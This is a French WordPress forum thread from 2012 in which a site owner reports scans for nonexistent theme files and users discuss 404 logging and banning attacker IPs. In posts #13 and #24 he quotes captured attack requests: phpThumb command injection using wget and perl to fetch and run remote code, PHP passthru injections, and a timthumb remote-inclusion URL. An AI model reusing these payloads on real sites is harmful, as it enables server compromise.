Annonce

Faites la différence entre le service WordPress.com et l'application libre WordPress.

Mettez-vous à jour ! WordPress 4.1 est disponible en français.

Annonce 1 : Le Codex en français a besoin de vous pour avancer !
Annonce 2 : Avant de poster, n'oubliez pas de faire une petite recherche et de lire les règles de ce forum.
Annonce 3 : Lisez notre blog, il regorge de bonnes informations.
Annonce 4 : Rejoignez-nous sur Facebook, Google + et sur Twitter

#1 05-01-2012 10:01:53

Bryan
Bavard WP
Lieu: Calais
Date d'inscription: 02-03-2008
Messages: 183
Site web

Recherche de masse du style.css

Bonjour,

Cela fait plusieurs semaines que j'ai un certain nombre de visiteurs de différents pays qui passent à interval régulier afin de scruter le fichier "style.css" de thèmes qui n'existent pas sur mes blogs.

- Avez-vous déjà rencontré le problème ?
- Serait-il un moyen de trouver une faille de sécurité ?

Quand pensez-vous ?

D'avance, merci pour vos réponses.

PS: j'ai la version 3.3.1 de Wordpress

Ci-dessous un exemple....

http://www.photo-a-la-une.fr/site/style-css.jpg

Dernière modification par Bryan (05-01-2012 17:56:51)


Découvrez mon site Bernard G. Photographie

Hors ligne

 

#2 06-01-2012 14:21:40

Bryan
Bavard WP
Lieu: Calais
Date d'inscription: 02-03-2008
Messages: 183
Site web

Re: Recherche de masse du style.css

Bon.

Visiblement personne ne gère ni ses liens entrants, ni ses error404.

sad


Découvrez mon site Bernard G. Photographie

Hors ligne

 

#3 06-01-2012 18:24:56

noaneo
Blogueur Fou
Date d'inscription: 18-03-2011
Messages: 26373
Site web

Re: Recherche de masse du style.css

merci de poster dans "support de WordPress" comme indiqué pour cette rubrique "Pas de support"

avez vous eu ces thèmes ?

Dernière modification par rvzen (07-01-2012 13:28:15)


signature:
noaneo
les MP seront supprimés sans être lus ,donc pas la peine de m'écrire,merci.
http://informatiquefrance.free.fr/sms/sms_04.gif

Hors ligne

 

#4 06-01-2012 20:41:27

fge
Modérateur
Lieu: Bourgogne / Rhône-Alpes
Date d'inscription: 22-12-2009
Messages: 7564

Re: Recherche de masse du style.css

@Rvzen, ce n'est pas à proprement parler du support

@Bryan : Eh bien non, tous les outils de stats ne tracent pas forcément par défaut les erreurs 404... Mais cela mérite qu'on s'y intéresse.

En ligne

 

#5 06-01-2012 22:22:49

Bryan
Bavard WP
Lieu: Calais
Date d'inscription: 02-03-2008
Messages: 183
Site web

Re: Recherche de masse du style.css

Ce n'est pas un support que je recherche, mais une simple discussion sur ce sujet wink

rvzen a écrit:

merci de poster dans "support de WordPress" comme indiqué pour cette rubrique "Pas de support"

avez vous eu ces thèmes ?


Découvrez mon site Bernard G. Photographie

Hors ligne

 

#6 06-01-2012 22:28:38

Bryan
Bavard WP
Lieu: Calais
Date d'inscription: 02-03-2008
Messages: 183
Site web

Re: Recherche de masse du style.css

fge a écrit:

@Rvzen, ce n'est pas à proprement parler du support

@Bryan : Eh bien non, tous les outils de stats ne tracent pas forcément par défaut les erreurs 404... Mais cela mérite qu'on s'y intéresse.

Merci pour ta compréhension.

Ayant mon propre plugin, il faut voir toutes les requêtes que certaines adresses IP opèrent.
Heureusement que Wordpress a toujours été bien sécurisé.


Découvrez mon site Bernard G. Photographie

Hors ligne

 

#7 07-01-2012 08:15:09

fge
Modérateur
Lieu: Bourgogne / Rhône-Alpes
Date d'inscription: 22-12-2009
Messages: 7564

Re: Recherche de masse du style.css

Heureusement que Wordpress a toujours été bien sécurisé.

WordPress est très régulièrement mis à jour ce qui n'est pas forcément le cas des thèmes. Thèmes et extensions peuvent également présenter des vulnérabilités.

En ligne

 

#8 07-01-2012 10:59:46

noaneo
Blogueur Fou
Date d'inscription: 18-03-2011
Messages: 26373
Site web

Re: Recherche de masse du style.css

excusez moi mais quand je lis "qu'en pensez vous " ? Avez vous déjà rencontré ce problème?Merci de vos réponses?
On est au delà d'une discussion.
De plus la description pour cette rubrique est

Discussion générale autour du blog WordPress


ce qui assez vague,discussion autour du blog WordPress-fr.net ? ou des sites qui tournent sous WordPress ?

Et pour finir j'ai tout de même posé une question,qui n'a pas eu de réponse.

rvzen a écrit:

avez vous eu ces thèmes ?

je réédite ce message car j'ai l'impression d'avoir offusqué Bryan,ce qui n'était pas mon but,j'en suis désolé.

Dernière modification par rvzen (07-01-2012 12:44:02)


signature:
noaneo
les MP seront supprimés sans être lus ,donc pas la peine de m'écrire,merci.
http://informatiquefrance.free.fr/sms/sms_04.gif

Hors ligne

 

#9 07-01-2012 12:20:10

Bryan
Bavard WP
Lieu: Calais
Date d'inscription: 02-03-2008
Messages: 183
Site web

Re: Recherche de masse du style.css

Vu la convivialité lors du lancement du sujet de discussion sur le forum,
je n'ai pas envie de répondre.

Jusque maintenant j'ai toujours réussi à tout faire seul.

Bye l'ami.

wp


Découvrez mon site Bernard G. Photographie

Hors ligne

 

#10 07-01-2012 12:42:59

noaneo
Blogueur Fou
Date d'inscription: 18-03-2011
Messages: 26373
Site web

Re: Recherche de masse du style.css

Dommage je ne suis pas buté,j'étais prête à dialoguer avec vous,moi.
Car justement j'aurai aimé savoir si ses recherches partaient sur d'anciens thèmes utilisés ou sur des thèmes au hasard.

Les erreurs 404 peuvent être géré par un fichier 404.php implanter dans son thème.
J'avoue que je ne regarde pas les liens entrants mais est ce que c'est vraiment important?
Cela nous renseigne sur quoi de connaître les liens entrants?

les liens que vous donnez au débuts,c'est vraiment des visiteurs ou des robots ?


signature:
noaneo
les MP seront supprimés sans être lus ,donc pas la peine de m'écrire,merci.
http://informatiquefrance.free.fr/sms/sms_04.gif

Hors ligne

 

#11 07-01-2012 12:48:56

Bryan
Bavard WP
Lieu: Calais
Date d'inscription: 02-03-2008
Messages: 183
Site web

Re: Recherche de masse du style.css

Dans un message ci-dessus j'avais indiqué:

Ayant mon propre plugin, il faut voir toutes les requêtes que certaines adresses IP opèrent.

Donc cela fonctionne avec n'importe quel thème

Le problème soulevé était une discussion à propos de la sécurisation de Wordpress.

wp


Découvrez mon site Bernard G. Photographie

Hors ligne

 

#12 07-01-2012 12:59:00

noaneo
Blogueur Fou
Date d'inscription: 18-03-2011
Messages: 26373
Site web

Re: Recherche de masse du style.css

oui j'ai lu ce message
http://www.photo-a-la-une.fr/site/style-css.jpg
mais là on voit que les requêtes vont vers plusieurs thèmes,ce que je voulais savoir si ces thèmes étaient présent sur votre blog ou non ?
Je me doute bien qu'aucun thème n'est protégé contre ça.
Ne faut-il pas mettre un fichier .htaccess dans wp-content pour sécuriser encore plus WordPress  ?


signature:
noaneo
les MP seront supprimés sans être lus ,donc pas la peine de m'écrire,merci.
http://informatiquefrance.free.fr/sms/sms_04.gif

Hors ligne

 

#13 07-01-2012 15:06:01

Bryan
Bavard WP
Lieu: Calais
Date d'inscription: 02-03-2008
Messages: 183
Site web

Re: Recherche de masse du style.css

Il n'y a aucun de ces thèmes présents sur mes blogs.

C'est pour cela que je viens à estimer que cela tend à tester des failles de sécurité.

Voici d'autres requêtes...

.../common/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9

.../img/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;

.../awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d

etc... etc...


Découvrez mon site Bernard G. Photographie

Hors ligne

 

#14 07-01-2012 17:28:10

noaneo
Blogueur Fou
Date d'inscription: 18-03-2011
Messages: 26373
Site web

Re: Recherche de masse du style.css

merci de m'avoir répondu,oui cela tente à dire c'est qu'il cherche des failles,à croire que ces thèmes ont des soucis de sécurités,car même si WordPress fait attention à la sécurité si un plugin ou un thème à une faille il y a un risque.
vous avez des plugins,des catpcha,etc??  pour sécuriser votre site?


signature:
noaneo
les MP seront supprimés sans être lus ,donc pas la peine de m'écrire,merci.
http://informatiquefrance.free.fr/sms/sms_04.gif

Hors ligne

 

#15 07-01-2012 17:44:33

Bryan
Bavard WP
Lieu: Calais
Date d'inscription: 02-03-2008
Messages: 183
Site web

Re: Recherche de masse du style.css

J'ai tout ce qu'il faut "à la maison" big_smile

Le sujet de la discussion que je viens d'ouvrir, était de dire qu'en se basant sur certains mots-clé
trouvés dans la redirection 404, l'idée était de récupérer l'adresse IP de ces "hackers".

En fonction de ces mots-clé, la personne est "bannie" à partir de mon HTACCESS qui est généré automatiquement.

Si la requête récupérée est un lien rompu de mon blog, cela me permet de faire une redirection 301
sur la bonne page recherche ou éventuellement une autre approchante.

Et les moteurs de recherche sont contents (lol)


Découvrez mon site Bernard G. Photographie

Hors ligne

 

#16 07-01-2012 17:59:58

noaneo
Blogueur Fou
Date d'inscription: 18-03-2011
Messages: 26373
Site web

Re: Recherche de masse du style.css

J'en suis sûr mais vu qu'on est sur un forum ,d'autres personnes peuvent lire ce sujet et cela peut les intéresser ou les interpeller.
on peut avoir le code ou l'astuce  pour faire de même  .htaccess .

merci


signature:
noaneo
les MP seront supprimés sans être lus ,donc pas la peine de m'écrire,merci.
http://informatiquefrance.free.fr/sms/sms_04.gif

Hors ligne

 

#17 07-01-2012 22:54:37

Bryan
Bavard WP
Lieu: Calais
Date d'inscription: 02-03-2008
Messages: 183
Site web

Re: Recherche de masse du style.css

C'est un plugin que j'ai développé.

Cela tient donc plus du "support" que de la simple conversation comme tu me l'a si bien répété au départ.

Codex


Découvrez mon site Bernard G. Photographie

Hors ligne

 

#18 07-01-2012 23:01:03

Guy
Blogueur
Date d'inscription: 07-04-2011
Messages: 15029

Re: Recherche de masse du style.css

Comme quoi l'open source n'est plus tout à fait ce qu'il était.

Hors ligne

 

#19 08-01-2012 00:12:51

noaneo
Blogueur Fou
Date d'inscription: 18-03-2011
Messages: 26373
Site web

Re: Recherche de masse du style.css

surtout que je pensais à tous les membres en posant cette question et non à moi.
ce n'est pas au bout de 15 ans de création de sites que je vais me prendre la tête avec ça.


signature:
noaneo
les MP seront supprimés sans être lus ,donc pas la peine de m'écrire,merci.
http://informatiquefrance.free.fr/sms/sms_04.gif

Hors ligne

 

#20 08-01-2012 09:43:49

Bryan
Bavard WP
Lieu: Calais
Date d'inscription: 02-03-2008
Messages: 183
Site web

Re: Recherche de masse du style.css

Tout à fait d'accord avec toi RVZEN.

Mais pour l'instant, je n'ai toujours aucune réponse: à savoir si éventuellement l'idée était bonne ?
C'est encore une question, mais ce n'est pas du support...
siffle


Découvrez mon site Bernard G. Photographie

Hors ligne

 

#21 08-01-2012 10:04:57

Guy
Blogueur
Date d'inscription: 07-04-2011
Messages: 15029

Re: Recherche de masse du style.css

Je n'ai toujours pas compris, le plugin est terminé et fonctionnel ou encore à l'état de projet?

Pour ce qui est des attaques, il y a évidement des robots qui scannent plus ou moins automatiquement à la recherche d’éventuelles failles connues dans les sites. Je me demande si il est pertinent de bannir une IP en sachant que cette IP a toute chance d'être temporaire.
Tu vas risquer de faire grossir inutilement ton .htaccess sans réel bénéfice, de plus, un utilisateur lambda qui a le malheur de se tromper d'adresse sera lui aussi banni?

Hors ligne

 

#22 08-01-2012 10:31:07

fge
Modérateur
Lieu: Bourgogne / Rhône-Alpes
Date d'inscription: 22-12-2009
Messages: 7564

Re: Recherche de masse du style.css

J'ai noté que dans la liste, tous les thèmes de la liste sauf un venaient du même site. On peut se poser la question de savoir s'il existe une vulnérabilité dans leur template de base ou dans plusieurs de leurs thèmes. Je ne pense pas que ce soit purement à fin de statistiques big_smile. Dans la liste ce sont tous des thèmes payant donc pas simple d'aller vérifier à moins de l'avoir acheté.

Apparemment il y a possibilité d'activer la recherche des pages 404 avec Google Analytics voir s'il est possible de faire également ressortir ces infos...

En ligne

 

#23 08-01-2012 17:34:50

Bryan
Bavard WP
Lieu: Calais
Date d'inscription: 02-03-2008
Messages: 183
Site web

Re: Recherche de masse du style.css

Merci à FGE pour cette pertinente remarque sur le fait que tous ces mêmes thèmes venaient d'un même site.

Le fait de bien gérer le htaccess n'est pas synonyme de surcharge.
Les adresses IP sont toujours étrangères. J'ai vite fait de débannir ces adresses voire remettre à zéro ma table.

Au départ, j'ai créé ce plugin car mon premier blog a déjà quelques années de vécu.
Il a été maintes fois remanier et les pages également.

Donc l'idée était de gérer mes erreurs 404 dynamiquement sinon cela aurait surcharger mon htaccess.

Visiblement pour l'instant GG n'a pas l'air de désapprécier, bien au contraire.

Sinon mon plugin est auto-installable, mais est-ce qu'il est réellement utile en l'état ?

Dernière modification par Bryan (08-01-2012 17:36:14)


Découvrez mon site Bernard G. Photographie

Hors ligne

 

#24 08-01-2012 17:41:43

Bryan
Bavard WP
Lieu: Calais
Date d'inscription: 02-03-2008
Messages: 183
Site web

Re: Recherche de masse du style.css

PS: voici la dernière erreur en date du jour de 17h19, adresse IP française

.../accueil/wp-content/themes/suffusion/timthumb.php?src=http://picasa.com.posterhome.com/perl/probot.php

Quand pensez-vous ?


Découvrez mon site Bernard G. Photographie

Hors ligne

 

#25 09-01-2012 07:41:49

Bryan
Bavard WP
Lieu: Calais
Date d'inscription: 02-03-2008
Messages: 183
Site web

Re: Recherche de masse du style.css

Sinon, les principales fonctionnalités de ce plugin sont de :
- gérer un mode maintenance avec une page d'accueil personnalisable
- d'autoriser/interdire le hotlinking
- de bloquer certains robots indésirables
- de bloquer les pseudo-hackers
- de détecter les liens rompus de mon blog
- de rediriger les liens morts en mode dynamique
- de gérer la table des liens de redirection
- de gérer la table de la blacklist
Un problème que je n'arrive pas résoudre, c'est qu'il ne me fait pas encore le café boulet

Dernière modification par Bryan (12-01-2012 20:51:02)


Découvrez mon site Bernard G. Photographie

Hors ligne

 

Pied de page des forums

Propulsé par PunBB 1.2.23
© Copyright 2005-2006 WordPress France

[ Generated in 1.980 seconds, 34 queries executed ]